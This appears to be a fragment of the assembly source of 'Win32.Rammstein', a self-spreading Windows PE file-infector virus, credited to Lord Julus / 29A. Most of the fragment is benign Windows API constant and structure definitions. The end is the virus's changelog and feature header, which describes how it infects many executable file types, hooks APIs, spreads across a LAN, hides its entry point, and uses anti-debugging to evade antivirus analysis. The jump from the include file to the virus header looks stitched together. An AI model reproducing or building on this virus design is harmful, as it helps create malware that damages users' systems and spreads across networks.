MSGF_USER EQU 4096
; Shell support
HSHELL_WINDOWCREATED EQU 1
HSHELL_WINDOWDESTROYED EQU 2
HSHELL_ACTIVATESHELLWINDOW EQU 3
HSHELL_WINDOWACTIVATED EQU 4
HSHELL_GETMINRECT EQU 5
HSHELL_REDRAW EQU 6
HSHELL_TASKMAN EQU 7
HSHELL_LANGUAGE EQU 8
HSHELL_ACCESSIBILITYSTATE EQU 11
ACCESS_STICKYKEYS EQU 0001h
ACCESS_FILTERKEYS EQU 0002h
ACCESS_MOUSEKEYS EQU 0003h
HKL_PREV EQU 0
HKL_NEXT EQU 1
KL_NAMELENGTH EQU 9
GMMP_USE_DISPLAY_POINTS EQU 1
GMMP_USE_HIGH_RESOLUTION_POINTS EQU 2
GWL_WNDPROC EQU -4
GWL_HINSTANCE EQU -6
GWL_HWNDPARENT EQU -8
GWL_STYLE EQU -16
GWL_EXSTYLE EQU -20
GWL_USERDATA EQU -21
GWL_ID EQU -12
GCL_MENUNAME EQU -8
GCL_HBRBACKGROUND EQU -10
GCL_HCURSOR EQU -12
GCL_HICON EQU -14
GCL_HMODULE EQU -16
GCL_CBWNDEXTRA EQU -18
GCL_CBCLSEXTRA EQU -20
GCL_WNDPROC EQU -24
GCL_STYLE EQU -26
GCW_ATOM EQU -32
GCL_HICONSM EQU -34
WA_INACTIVE EQU 0
WA_ACTIVE EQU 1
WA_CLICKACTIVE EQU 2
; Window Messages
WMSZ_LEFT EQU 1
WMSZ_RIGHT EQU 2
WMSZ_TOP EQU 3
WMSZ_TOPLEFT EQU 4
WMSZ_TOPRIGHT EQU 5
WMSZ_BOTTOM EQU 6
WMSZ_BOTTOMLEFT EQU 7
WMSZ_BOTTOMRIGHT EQU 8
PWR_OK EQU 1
PWR_FAIL EQU -1
PWR_SUSPENDREQUEST EQU 1
PWR_SUSPENDRESUME EQU 2
PWR_CRITICALRESUME EQU 3
NFR_ANSI EQU 1
NFR_UNICODE EQU 2
NF_QUERY EQU 3
NF_REQUERY EQU 4
; LOWORD(wParam) in WM_KEYBOARDCUES
KC_SHOW EQU 1
KC_HIDE EQU 2
KC_QUERY EQU 3
; HIWORD(wParam) in WM_KEYBOARDCUES
KCF_FOCUS EQU 1
KCF_ACCEL EQU 2
;MOUSEHOOKSTRUCT STRUC
; pt POINT <?>
; mh_hwnd DD ?
; wHitTestCode DD ?
; dwExtraInfo DD ?
;MOUSEHOOKSTRUCT ENDS
HTERROR EQU -2
HTTRANSPARENT EQU -1
HTNOWHERE EQU 0
HTCLIENT EQU 1
HTCAPTION EQU 2
HTSYSMENU EQU 3
HTGROWBOX EQU 4
HTSIZE EQU HTGROWBOX
HTMENU EQU 5
HTHSCROLL EQU 6
HTVSCROLL EQU 7
HTMINBUTTON EQU 8
HTMAXBUTTON EQU 9
HTLEFT EQU 10
HTRIGHT EQU 11
HTTOP EQU 12
HTTOPLEFT EQU 13
HTTOPRIGHT EQU 14
HTBOTTOM EQU 15
HTBOTTOMLEFT EQU 16
HTBOTTOMRIGHT EQU 17
HTBORDER EQU 18
HTREDUCE EQU HTMINBUTTON
HTZOOM EQU HTMAXBUTTON
HTSIZEFIRST EQU HTLEFT
HTSIZELAST EQU HTBOTTOMRIGHT
HTOBJECT EQU 19
HTCLOSE EQU 20
HTHELP EQU 21
; SendMessageTimeout values
MA_ACTIVATE EQU 1
MA_ACTIVATEANDEAT EQU 2
MA_NOACTIVATE EQU 3
MA_NOACTIVATEANDEAT EQU 4
ICON_SMALL EQU 0
ICON_BIG EQU 1
SIZE_RESTORED EQU 0
SIZE_MINIMIZED EQU 1
SIZE_MAXIMIZED EQU 2
SIZE_MAXSHOW EQU 3
SIZE_MAXHIDE EQU 4
; Window styles
; Class styles
;WM_PRINT flags
; 3D border styles
; Border flags
; For diagonal lines, the BF_RECT flags specify the end point of the
; vector bounded by the rectangle parameter.
DFC_CAPTION EQU 1
DFC_MENU EQU 2
DFC_SCROLL EQU 3
DFC_BUTTON EQU 4
DFC_POPUPMENU EQU 5
DFCS_CAPTIONCLOSE EQU 0000h
DFCS_CAPTIONMIN EQU 0001h
DFCS_CAPTIONMAX EQU 0002h
DFCS_CAPTIONRESTORE EQU 0003h
DFCS_CAPTIONHELP EQU 0004h
DFCS_MENUARROW EQU 0000h
DFCS_MENUCHECK EQU 0001h
DFCS_MENUBULLET EQU 0002h
DFCS_MENUARROWRIGHT EQU 0004h
DFCS_SCROLLUP EQU 0000h
DFCS_SCROLLDOWN EQU 0001h
DFCS_SCROLLLEFT EQU 0002h
DFCS_SCROLLRIGHT EQU 0003h
DFCS_SCROLLCOMBOBOX EQU 0005h
DFCS_SCROLLSIZEGRIP EQU 0008h
DFCS_SCROLLSIZEGRIPRIGHT EQU 0010h
DFCS_BUTTONCHECK EQU 0000h
DFCS_BUTTONRADIOIMAGE EQU 0001h
DFCS_BUTTONRADIOMASK EQU 0002h
DFCS_BUTTONRADIO EQU 0004h
DFCS_BUTTON3STATE EQU 0008h
DFCS_BUTTONPUSH EQU 0010h
DFCS_INACTIVE EQU 0100h
DFCS_PUSHED EQU 0200h
DFCS_CHECKED EQU 0400h
DFCS_TRANSPARENT EQU 0800h
DFCS_HOT EQU 1000h
DFCS_ADJUSTRECT EQU 2000h
DFCS_FLAT EQU 4000h
DFCS_MONO EQU 8000h
CF_TEXT EQU 1
CF_BITMAP EQU 2
CF_METAFILEPICT EQU 3
CF_SYLK EQU 4
CF_DIF EQU 5
CF_TIFF EQU 6
CF_OEMTEXT EQU 7
CF_DIB EQU 8
CF_PALETTE EQU 9
CF_PENDATA EQU 10
CF_RIFF EQU 11
CF_WAVE EQU 12
CF_UNICODETEXT EQU 13
CF_ENHMETAFILE EQU 14
CF_HDROP EQU 15
CF_LOCALE EQU 16
CF_DIBV5 EQU 17
CF_MAX EQU 18
CF_OWNERDISPLAY EQU 0080h
CF_DSPTEXT EQU 0081h
CF_DSPBITMAP EQU 0082h
CF_DSPMETAFILEPICT EQU 0083h
CF_DSPENHMETAFILE EQU 008Eh
CF_PRIVATEFIRST EQU 0200h
CF_PRIVATELAST EQU 02FFh
CF_GDIOBJFIRST EQU 0300h
CF_GDIOBJLAST EQU 03FFh
; PeekMessage() Options
; RegisterDeviceNotification
FLASHW_STOP EQU 0
FLASHW_CAPTION EQU 00000001h
FLASHW_TRAY EQU 00000002h
FLASHW_ALL EQU (FLASHW_CAPTION OR FLASHW_TRAY)
FLASHW_TIMER EQU 00000004h
FLASHW_TIMERNOFG EQU 0000000Ch
; SetWindowPos Flags
HWND_TOP EQU 0
HWND_BOTTOM EQU 1
HWND_TOPMOST EQU -1
HWND_NOTOPMOST EQU -2
INPUT_MOUSE EQU 0
INPUT_KEYBOARD EQU 1
INPUT_HARDWARE EQU 2
; TBBUTTON
TBBUTTON struc
iBitmap UINT ?
idCommand UINT ?
fsState UCHAR ?
fsStyle UCHAR ?
bReserved db 2 dup(?)
dwData ULONG ?
iString UINT ?
TBBUTTON ends
; GetSystemMetrics() codes
SM_CXSCREEN EQU 0
SM_CYSCREEN EQU 1
SM_CXVSCROLL EQU 2
SM_CYHSCROLL EQU 3
SM_CYCAPTION EQU 4
SM_CXBORDER EQU 5
SM_CYBORDER EQU 6
SM_CXDLGFRAME EQU 7
SM_CYDLGFRAME EQU 8
SM_CYVTHUMB EQU 9
SM_CXHTHUMB EQU 10
SM_CXICON EQU 11
SM_CYICON EQU 12
SM_CXCURSOR EQU 13
SM_CYCURSOR EQU 14
SM_CYMENU EQU 15
SM_CXFULLSCREEN EQU 16
SM_CYFULLSCREEN EQU 17
SM_CYKANJIWINDOW EQU 18
SM_MOUSEPRESENT EQU 19
SM_CYVSCROLL EQU 20
SM_CXHSCROLL EQU 21
SM_DEBUG EQU 22
SM_SWAPBUTTON EQU 23
SM_RESERVED1 EQU 24
SM_RESERVED2 EQU 25
SM_RESERVED3 EQU 26
SM_RESERVED4 EQU 27
SM_CXMIN EQU 28
SM_CYMIN EQU 29
SM_CXSIZE EQU 30
SM_CYSIZE EQU 31
SM_CXFRAME EQU 32
SM_CYFRAME EQU 33
SM_CXMINTRACK EQU 34
SM_CYMINTRACK EQU 35
SM_CXDOUBLECLK EQU 36
SM_CYDOUBLECLK EQU 37
SM_CXICONSPACING EQU 38
SM_CYICONSPACING EQU 39
SM_MENUDROPALIGNMENT EQU 40
SM_PENWINDOWS EQU 41
SM_DBCSENABLED EQU 42
SM_CMOUSEBUTTONS EQU 43
SM_CXFIXEDFRAME EQU SM_CXDLGFRAME ;win40 name change
SM_CYFIXEDFRAME EQU SM_CYDLGFRAME ;win40 name change
SM_CXSIZEFRAME EQU SM_CXFRAME ;win40 name change
SM_CYSIZEFRAME EQU SM_CYFRAME ;win40 name change
SM_SECURE EQU 44
SM_CXEDGE EQU 45
SM_CYEDGE EQU 46
SM_CXMINSPACING EQU 47
SM_CYMINSPACING EQU 48
SM_CXSMICON EQU 49
SM_CYSMICON EQU 50
SM_CYSMCAPTION EQU 51
SM_CXSMSIZE EQU 52
SM_CYSMSIZE EQU 53
SM_CXMENUSIZE EQU 54
SM_CYMENUSIZE EQU 55
SM_ARRANGE EQU 56
SM_CXMINIMIZED EQU 57
SM_CYMINIMIZED EQU 58
SM_CXMAXTRACK EQU 59
SM_CYMAXTRACK EQU 60
SM_CXMAXIMIZED EQU 61
SM_CYMAXIMIZED EQU 62
SM_NETWORK EQU 63
SM_CLEANBOOT EQU 67
SM_CXDRAG EQU 68
SM_CYDRAG EQU 69
SM_SHOWSOUNDS EQU 70
SM_CXMENUCHECK EQU 71 ; Use instead of GetMenuCheckMarkDimensions()!
SM_CYMENUCHECK EQU 72
SM_SLOWMACHINE EQU 73
SM_MIDEASTENABLED EQU 74
SM_MOUSEWHEELPRESENT EQU 75
SM_XVIRTUALSCREEN EQU 76
SM_YVIRTUALSCREEN EQU 77
SM_CXVIRTUALSCREEN EQU 78
SM_CYVIRTUALSCREEN EQU 79
SM_CMONITORS EQU 80
SM_SAMEDISPLAYFORMAT EQU 81
SM_CMETRICS EQU 76
SM_REMOTESESSION EQU 1000
MNC_IGNORE EQU 0
MNC_CLOSE EQU 1
MNC_EXECUTE EQU 2
MNC_SELECT EQU 3
MND_CONTINUE EQU 0
MND_ENDMENU EQU 1
HBMMENU_CALLBACK EQU -1
HBMMENU_SYSTEM EQU 1
HBMMENU_MBAR_RESTORE EQU 2
HBMMENU_MBAR_MINIMIZE EQU 3
HBMMENU_MBAR_CLOSE EQU 5
HBMMENU_MBAR_CLOSE_D EQU 6
HBMMENU_MBAR_MINIMIZE_D EQU 7
HBMMENU_POPUP_CLOSE EQU 8
HBMMENU_POPUP_RESTORE EQU 9
HBMMENU_POPUP_MAXIMIZE EQU 10
HBMMENU_POPUP_MINIMIZE EQU 11
; State type
; GetDCEx() flags
; RedrawWindow() flags
; EnableScrollBar() flags
; MessageBox() Flags
; Shell definitions
NOTIFYICONDATA STRUC
cbSize DD SIZE NOTIFYICONDATA
hWnd DD 0
uID DD 0
uNIFlags DD 0
uCallbackMessage DD 0
hIcon DD 0
szTip DB 64 DUP(0)
NOTIFYICONDATA ENDS
; Color Types
CTLCOLOR_MSGBOX EQU 0
CTLCOLOR_EDIT EQU 1
CTLCOLOR_LISTBOX EQU 2
CTLCOLOR_BTN EQU 3
CTLCOLOR_DLG EQU 4
CTLCOLOR_SCROLLBAR EQU 5
CTLCOLOR_STATIC EQU 6
CTLCOLOR_MAX EQU 7
COLOR_SCROLLBAR EQU 0
COLOR_BACKGROUND EQU 1
COLOR_ACTIVECAPTION EQU 2
COLOR_INACTIVECAPTION EQU 3
COLOR_MENU EQU 4
COLOR_WINDOW EQU 5
COLOR_WINDOWFRAME EQU 6
COLOR_MENUTEXT EQU 7
COLOR_WINDOWTEXT EQU 8
COLOR_CAPTIONTEXT EQU 9
COLOR_ACTIVEBORDER EQU 10
COLOR_INACTIVEBORDER EQU 11
COLOR_APPWORKSPACE EQU 12
COLOR_HIGHLIGHT EQU 13
COLOR_HIGHLIGHTTEXT EQU 14
COLOR_BTNFACE EQU 15
COLOR_BTNSHADOW EQU 16
COLOR_GRAYTEXT EQU 17
COLOR_BTNTEXT EQU 18
COLOR_INACTIVECAPTIONTEXT EQU 19
COLOR_BTNHIGHLIGHT EQU 20
COLOR_3DDKSHADOW EQU 21
COLOR_3DLIGHT EQU 22
COLOR_INFOTEXT EQU 23
COLOR_INFOBK EQU 24
COLOR_HOTLIGHT EQU 26
COLOR_GRADIENTACTIVECAPTION EQU 27
COLOR_GRADIENTINACTIVECAPTION EQU 28
COLOR_DESKTOP EQU COLOR_BACKGROUND
COLOR_3DFACE EQU COLOR_BTNFACE
COLOR_3DSHADOW EQU COLOR_BTNSHADOW
COLOR_3DHIGHLIGHT EQU COLOR_BTNHIGHLIGHT
COLOR_3DHILIGHT EQU COLOR_BTNHIGHLIGHT
COLOR_BTNHILIGHT EQU COLOR_BTNHIGHLIGHT
; GetWindow() Constants
GW_HWNDFIRST EQU 0
GW_HWNDLAST EQU 1
GW_HWNDNEXT EQU 2
GW_HWNDPREV EQU 3
GW_OWNER EQU 4
GW_CHILD EQU 5
GW_MAX EQU 5
GW_ENABLEDPOPUP EQU 6
IMAGE_BITMAP EQU 0
IMAGE_ICON EQU 1
IMAGE_CURSOR EQU 2
IMAGE_ENHMETAFILE EQU 3
IDOK EQU 1
IDCANCEL EQU 2
IDABORT EQU 3
IDRETRY EQU 4
IDIGNORE EQU 5
IDYES EQU 6
IDNO EQU 7
IDCLOSE EQU 8
IDHELP EQU 9
WB_LEFT EQU 0
WB_RIGHT EQU 1
WB_ISDELIMITER EQU 2
BN_CLICKED EQU 0
BN_PAINT EQU 1
BN_HILITE EQU 2
BN_UNHILITE EQU 3
BN_DISABLE EQU 4
BN_DOUBLECLICKED EQU 5
BN_PUSHED EQU BN_HILITE
BN_UNPUSHED EQU BN_UNHILITE
BN_DBLCLK EQU BN_DOUBLECLICKED
BN_SETFOCUS EQU 6
BN_KILLFOCUS EQU 7
; Dialog Styles
; Dialog Codes
LB_OKAY EQU 0
LB_ERR EQU -1
LB_ERRSPACE EQU -2
LBN_ERRSPACE EQU -2
LBN_SELCHANGE EQU 1
LBN_DBLCLK EQU 2
LBN_SELCANCEL EQU 3
LBN_SETFOCUS EQU 4
LBN_KILLFOCUS EQU 5
; Listbox messages
; Listbox Styles
CB_OKAY EQU 0
CB_ERR EQU -1
CB_ERRSPACE EQU -2
CBN_ERRSPACE EQU -1
CBN_SELCHANGE EQU 1
CBN_DBLCLK EQU 2
CBN_SETFOCUS EQU 3
CBN_KILLFOCUS EQU 4
CBN_EDITCHANGE EQU 5
CBN_EDITUPDATE EQU 6
CBN_DROPDOWN EQU 7
CBN_CLOSEUP EQU 8
CBN_SELENDOK EQU 9
CBN_SELENDCANCEL EQU 10
CCS_TOP = 00000001h
CCS_NOMOVEY = 00000002h
CCS_BOTTOM = 00000003h
CCS_NORESIZE = 00000004h
CCS_NOPARENTALIGN = 00000008h
CCS_ADJUSTABLE = 00000020h
CCS_NODIVIDER = 00000040h
TBSTATE_CHECKED = 01h
TBSTATE_PRESSED = 02h
TBSTATE_ENABLED = 04h
TBSTATE_HIDDEN = 08h
TBSTATE_INDETERMINATE = 10h
TBSTATE_WRAP = 20h
TBSTYLE_BUTTON = 00h
TBSTYLE_SEP = 01h
TBSTYLE_CHECK = 02h
TBSTYLE_GROUP = 04h
TBSTYLE_CHECKGROUP = TBSTYLE_GROUP+TBSTYLE_CHECK
TBSTYLE_TOOLTIPS = 0100h
TBSTYLE_WRAPABLE = 0200h
TBSTYLE_ALTDRAG = 0400h
TB_ENABLEBUTTON = (WM_USER + 1)
TB_CHECKBUTTON = (WM_USER + 2)
TB_PRESSBUTTON = (WM_USER + 3)
TB_HIDEBUTTON = (WM_USER + 4)
TB_INDETERMINATE = (WM_USER + 5)
TB_ISBUTTONENABLED = (WM_USER + 9)
TB_ISBUTTONCHECKED = (WM_USER + 10)
TB_ISBUTTONPRESSED = (WM_USER + 11)
TB_ISBUTTONHIDDEN = (WM_USER + 12)
TB_ISBUTTONINDETERMINATE = (WM_USER + 13)
TB_SETSTATE = (WM_USER + 17)
TB_GETSTATE = (WM_USER + 18)
TB_ADDBITMAP = (WM_USER + 19)
TB_SAVERESTOREA = (WM_USER + 26)
TB_SAVERESTOREW = (WM_USER + 76)
TB_CUSTOMIZE = (WM_USER + 27)
TB_ADDSTRINGA = (WM_USER + 28)
TB_ADDSTRINGW = (WM_USER + 77)
TB_GETITEMRECT = (WM_USER + 29)
TB_BUTTONSTRUCTSIZE = (WM_USER + 30)
TB_SETBUTTONSIZE = (WM_USER + 31)
TB_SETBITMAPSIZE = (WM_USER + 32)
TB_AUTOSIZE = (WM_USER + 33)
TB_GETTOOLTIPS = (WM_USER + 35)
TB_SETTOOLTIPS = (WM_USER + 36)
TB_SETPARENT = (WM_USER + 37)
TB_SETROWS = (WM_USER + 39)
TB_GETROWS = (WM_USER + 40)
TB_SETCMDID = (WM_USER + 42)
TB_CHANGEBITMAP = (WM_USER + 43)
TB_GETBITMAP = (WM_USER + 44)
TB_GETBUTTONTEXTA = (WM_USER + 45)
TB_GETBUTTONTEXTW = (WM_USER + 75)
TB_REPLACEBITMAP = (WM_USER + 46)
SPI_GETBEEP EQU 1
SPI_SETBEEP EQU 2
SPI_GETMOUSE EQU 3
SPI_SETMOUSE EQU 4
SPI_GETBORDER EQU 5
SPI_SETBORDER EQU 6
SPI_GETKEYBOARDSPEED EQU 10
SPI_SETKEYBOARDSPEED EQU 11
SPI_LANGDRIVER EQU 12
SPI_ICONHORIZONTALSPACING EQU 13
SPI_GETSCREENSAVETIMEOUT EQU 14
SPI_SETSCREENSAVETIMEOUT EQU 15
SPI_GETSCREENSAVEACTIVE EQU 16
SPI_SETSCREENSAVEACTIVE EQU 17
SPI_GETGRIDGRANULARITY EQU 18
SPI_SETGRIDGRANULARITY EQU 19
SPI_SETDESKWALLPAPER EQU 20
SPI_SETDESKPATTERN EQU 21
SPI_GETKEYBOARDDELAY EQU 22
SPI_SETKEYBOARDDELAY EQU 23
SPI_ICONVERTICALSPACING EQU 24
SPI_GETICONTITLEWRAP EQU 25
SPI_SETICONTITLEWRAP EQU 26
SPI_GETMENUDROPALIGNMENT EQU 27
SPI_SETMENUDROPALIGNMENT EQU 28
SPI_SETDOUBLECLKWIDTH EQU 29
SPI_SETDOUBLECLKHEIGHT EQU 30
SPI_GETICONTITLELOGFONT EQU 31
SPI_SETDOUBLECLICKTIME EQU 32
SPI_SETMOUSEBUTTONSWAP EQU 33
SPI_SETICONTITLELOGFONT EQU 34
SPI_GETFASTTASKSWITCH EQU 35
SPI_SETFASTTASKSWITCH EQU 36
SPI_SETDRAGFULLWINDOWS EQU 37
SPI_GETDRAGFULLWINDOWS EQU 38
SPI_GETNONCLIENTMETRICS EQU 41
SPI_SETNONCLIENTMETRICS EQU 42
SPI_GETMINIMIZEDMETRICS EQU 43
SPI_SETMINIMIZEDMETRICS EQU 44
SPI_GETICONMETRICS EQU 45
SPI_SETICONMETRICS EQU 46
SPI_SETWORKAREA EQU 47
SPI_GETWORKAREA EQU 48
SPI_SETPENWINDOWS EQU 49
SPI_GETHIGHCONTRAST EQU 66
SPI_SETHIGHCONTRAST EQU 67
SPI_GETKEYBOARDPREF EQU 68
SPI_SETKEYBOARDPREF EQU 69
SPI_GETSCREENREADER EQU 70
SPI_SETSCREENREADER EQU 71
SPI_GETANIMATION EQU 72
SPI_SETANIMATION EQU 73
SPI_GETFONTSMOOTHING EQU 74
SPI_SETFONTSMOOTHING EQU 75
SPI_SETDRAGWIDTH EQU 76
SPI_SETDRAGHEIGHT EQU 77
SPI_SETHANDHELD EQU 78
SPI_GETLOWPOWERTIMEOUT EQU 79
SPI_GETPOWEROFFTIMEOUT EQU 80
SPI_SETLOWPOWERTIMEOUT EQU 81
SPI_SETPOWEROFFTIMEOUT EQU 82
SPI_GETLOWPOWERACTIVE EQU 83
SPI_GETPOWEROFFACTIVE EQU 84
SPI_SETLOWPOWERACTIVE EQU 85
SPI_SETPOWEROFFACTIVE EQU 86
SPI_SETCURSORS EQU 87
SPI_SETICONS EQU 88
SPI_GETDEFAULTINPUTLANG EQU 89
SPI_SETDEFAULTINPUTLANG EQU 90
SPI_SETLANGTOGGLE EQU 91
SPI_GETWINDOWSEXTENSION EQU 92
SPI_SETMOUSETRAILS EQU 93
SPI_GETMOUSETRAILS EQU 94
SPI_SETSCREENSAVERRUNNING EQU 97
SPI_SCREENSAVERRUNNING EQU SPI_SETSCREENSAVERRUNNING
SPI_GETFILTERKEYS EQU 50
SPI_SETFILTERKEYS EQU 51
SPI_GETTOGGLEKEYS EQU 52
SPI_SETTOGGLEKEYS EQU 53
SPI_GETMOUSEKEYS EQU 54
SPI_SETMOUSEKEYS EQU 55
SPI_GETSHOWSOUNDS EQU 56
SPI_SETSHOWSOUNDS EQU 57
SPI_GETSTICKYKEYS EQU 58
SPI_SETSTICKYKEYS EQU 59
SPI_GETACCESSTIMEOUT EQU 60
SPI_SETACCESSTIMEOUT EQU 61
SPI_GETSERIALKEYS EQU 62
SPI_SETSERIALKEYS EQU 63
SPI_GETSOUNDSENTRY EQU 64
SPI_SETSOUNDSENTRY EQU 65
SPI_GETSNAPTODEFBUTTON EQU 95
SPI_SETSNAPTODEFBUTTON EQU 96
SPI_GETMOUSEHOVERWIDTH EQU 98
SPI_SETMOUSEHOVERWIDTH EQU 99
SPI_GETMOUSEHOVERHEIGHT EQU 100
SPI_SETMOUSEHOVERHEIGHT EQU 101
SPI_GETMOUSEHOVERTIME EQU 102
SPI_SETMOUSEHOVERTIME EQU 103
SPI_GETWHEELSCROLLLINES EQU 104
SPI_SETWHEELSCROLLLINES EQU 105
SPI_GETMENUSHOWDELAY EQU 106
SPI_SETMENUSHOWDELAY EQU 107
SPI_GETSHOWIMEUI EQU 110
SPI_SETSHOWIMEUI EQU 111
SPI_GETMOUSESPEED EQU 112
SPI_SETMOUSESPEED EQU 113
SPI_GETSCREENSAVERRUNNING EQU 114
SPI_GETACTIVEWINDOWTRACKING EQU 1000h
SPI_SETACTIVEWINDOWTRACKING EQU 1001h
SPI_GETMENUANIMATION EQU 1002h
SPI_SETMENUANIMATION EQU 1003h
SPI_GETCOMBOBOXANIMATION EQU 1004h
SPI_SETCOMBOBOXANIMATION EQU 1005h
SPI_GETLISTBOXSMOOTHSCROLLING EQU 1006h
SPI_SETLISTBOXSMOOTHSCROLLING EQU 1007h
SPI_GETGRADIENTCAPTIONS EQU 1008h
SPI_SETGRADIENTCAPTIONS EQU 1009h
SPI_GETKEYBOARDCUES EQU 100Ah
SPI_SETKEYBOARDCUES EQU 100Bh
SPI_GETMENUUNDERLINES EQU SPI_GETKEYBOARDCUES
SPI_SETMENUUNDERLINES EQU SPI_SETKEYBOARDCUES
SPI_GETACTIVEWNDTRKZORDER EQU 100Ch
SPI_SETACTIVEWNDTRKZORDER EQU 100Dh
SPI_GETHOTTRACKING EQU 100Eh
SPI_SETHOTTRACKING EQU 100Fh
SPI_GETMENUFADE EQU 1012h
SPI_SETMENUFADE EQU 1013h
SPI_GETSELECTIONFADE EQU 1014h
SPI_SETSELECTIONFADE EQU 1015h
SPI_GETTOOLTIPANIMATION EQU 1016h
SPI_SETTOOLTIPANIMATION EQU 1017h
SPI_GETTOOLTIPFADE EQU 1018h
SPI_SETTOOLTIPFADE EQU 1019h
SPI_GETCURSORSHADOW EQU 101Ah
SPI_SETCURSORSHADOW EQU 101Bh
SPI_GETUIEFFECTS EQU 103Eh
SPI_SETUIEFFECTS EQU 103Fh
SPI_GETFOREGROUNDLOCKTIMEOUT EQU 2000h
SPI_SETFOREGROUNDLOCKTIMEOUT EQU 2001h
SPI_GETACTIVEWNDTRKTIMEOUT EQU 2002h
SPI_SETACTIVEWNDTRKTIMEOUT EQU 2003h
SPI_GETFOREGROUNDFLASHCOUNT EQU 2004h
SPI_SETFOREGROUNDFLASHCOUNT EQU 2005h
SPI_GETCARETWIDTH EQU 2006h
SPI_SETCARETWIDTH EQU 2007h
; NMHDR
NMHDR struc
hwndFrom UINT ?
idFrom UINT ?
code UINT ?
NMHDR ends
; TOOLTIPTEXT
TOOLTIPTEXT struc
hdr NMHDR <?>
lpszText ULONG ?
szText db 80 dup(?)
hinst ULONG ?
uFlags UINT ?
TOOLTIPTEXT ends
DISP_CHANGE_SUCCESSFUL EQU 0
DISP_CHANGE_RESTART EQU 1
DISP_CHANGE_FAILED EQU -1
DISP_CHANGE_BADMODE EQU -2
DISP_CHANGE_NOTUPDATED EQU -3
DISP_CHANGE_BADFLAGS EQU -4
DISP_CHANGE_BADPARAM EQU -5
; EVENT DEFINITION
SOUND_SYSTEM_STARTUP EQU 1
SOUND_SYSTEM_SHUTDOWN EQU 2
SOUND_SYSTEM_BEEP EQU 3
SOUND_SYSTEM_ERROR EQU 4
SOUND_SYSTEM_QUESTION EQU 5
SOUND_SYSTEM_WARNING EQU 6
SOUND_SYSTEM_INFORMATION EQU 7
SOUND_SYSTEM_MAXIMIZE EQU 8
SOUND_SYSTEM_MINIMIZE EQU 9
SOUND_SYSTEM_RESTOREUP EQU 10
SOUND_SYSTEM_RESTOREDOWN EQU 11
SOUND_SYSTEM_APPSTART EQU 12
SOUND_SYSTEM_FAULT EQU 13
SOUND_SYSTEM_APPEND EQU 14
SOUND_SYSTEM_MENUCOMMAND EQU 15
SOUND_SYSTEM_MENUPOPUP EQU 16
CSOUND_SYSTEM EQU 16
CCHILDREN_TITLEBAR EQU 5
CCHILDREN_SCROLLBAR EQU 5
CURSOR_SHOWING EQU 00000001h
HELP_CONTEXT = 0001h
HELP_QUIT = 0002h
HELP_INDEX = 0003h
HELP_CONTENTS = 0003h
HELP_HELPONHELP = 0004h
HELP_SETINDEX = 0005h
HELP_SETCONTENTS = 0005h
HELP_CONTEXTPOPUP = 0008h
HELP_FORCEFILE = 0009h
HELP_KEY = 0101h
HELP_COMMAND = 0102h
HELP_PARTIALKEY = 0105h
HELP_MULTIKEY = 0201h
HELP_SETWINPOS = 0203h
HELP_CONTEXTMENU = 000ah
HELP_FINDER = 000bh
HELP_WM_HELP = 000ch
HELP_SETPOPUP_POS = 000dh
HELP_TCARD = 8000h
HELP_TCARD_DATA = 0010h
HELP_TCARD_OTHER_CALLER = 0011h
IDH_NO_HELP = 28440
IDH_MISSING_CONTEXT = 28441
IDH_GENERIC_HELP_BUTTON = 28442
IDH_OK = 28443
IDH_CANCEL = 28444
IDH_HELP = 28445
OSVERSIONINFOA STRUCT
dwOSVersionInfoSize DD ?
dwMajorVersion DD ?
dwMinorVersion DD ?
dwBuildNumber DD ?
dwPlatformId DD ?
szCSDVersion DB 128 DUP(?)
OSVERSIONINFOA ENDS
v4.0
= Final Release =
===================================================================
DISCLAIMER
09 Sep 2000 - Today I made a small improvement. When the dropper roams
the net onto another computer it remains in the windows
dir and it represents a weak point which might be noticed
by an av. So, now, the virus will smartly remove either
the dropper or the entry in the win.ini file if one of
them is missing. If both are there, they are left alone
because they will remove eachother. Added Pstores.exe to
the black list. Thanks to Evul for pointing me out that
it is a rather peculiar file and cannot be safely
infected.
22 Jul 2000 - The virus has moved up to version 4.0. Today I added
the network infector. It comes in a separate thread.
For the moment looks like everything works fine. Will
add a timer to it so that it does not hang in huge
networks... Virus is above 14k now... Waiting for the
LZ!
22 May 2000 - Added EPO on files that have the viral code outside the
code section. Basically from now on the entry point stays
only into the code section. The epo is not actually epo,
because as I started to code it I decided to make it very
complicated so I will include the complicated part in the
next release. It will be the so called LJILE32 <Lord
Julus' Instruction Length Engine 32>. This engine will
allow me to have an exact location of the opcode for each
instruction so we will be able to look up any call, jump
or conditional jump to place our code call there. So for
this version only a jump at the original eip.
21 May 2000 - Fixed a bug in the api hooker... I forgot that some import
sections have a null pointer to names. Also added the
infection by last section increase for files who cannot
be infected otherwise. All files should be touched now.
Also I fixed the problem with the payload window not
closing after the process closed. I solved half of it
as some files like wordpad.exe still have this problem.
====================================================================
Virus Name ........... Win32.Rammstein
Virus Version ........ 4.0
Virus Size ........... 13346 (debug), 14520 (release)
Virus Author ......... Lord Julus / 29A
Release Date ......... 04 May 2000
Virus type ........... PE infector
Target OS ............ Win95, Win98, WinNT, Win2000
Target Files ......... many PE file types:
EXE COM ACM CPL HDI OCX PCI
QTC SCR X32 CNV FMT OCM OLB WPC
Append Method ........ The virus will check wether there is enough room
for it inside the code section. If there is not
enough room the virus will be placed at end. If
there is it will be inserted inside the code
section at a random offset while the original
code will be saved at end. The placing at the end
has also two variants. If the last section is
Resources or Relocations the virus will insert a
new section before the last section and place the
data there, also rearranging the last section's
RVAs. If the last section is another section a
new section will be placed at end. The name of
the new section is a common section name which is
choosed based on the existing names so that it
does not repeat. If the virus is placed at the
end just a small EPO code is used so that the eip
stays inside the code section.
A special situation occurs if there is no enough
space to add a new section header, for example
when the code section starts at RVA 200 (end of
headers). In this situation the virus will
increase the last section in order to append.
Infect Methods ....... -Direct file attacks: the virus will attack
specific files in the windows directory, files
which are most used by people
-Directory scan: all files in the current
directory will be infected, as well as 3 files in
the system directory and 3 in the windows
directory
-Api hooking (per-process residency): the virus
hooks a few api calls and infects files as the
victim uses the apis
-Intranet spreading: the virus spreads into the
LAN using only windows apis
Features ............. Multiple threads: the virus launches a main
thread. While this thread executes, in the same
time, the original thread returns to host, so no
slowing down appears. The main viral thread
launches other 6 threads and monitors their
execution. If one of the threads is not able to
finish the system is hanged because it means
somebody tryied to patch some of the thread code.
Heavy anti-debugging: i tried to use almost all
the anti-debug and anti-emulation stuff that I
know
FPU: uses fpu instructions
Crc32 search: uses crc32 to avoid waste of space
Memory roaming: allocates virtual memory and
jumps in it
Interlaced code: this means that some threads
share the same piece of code and the virus is
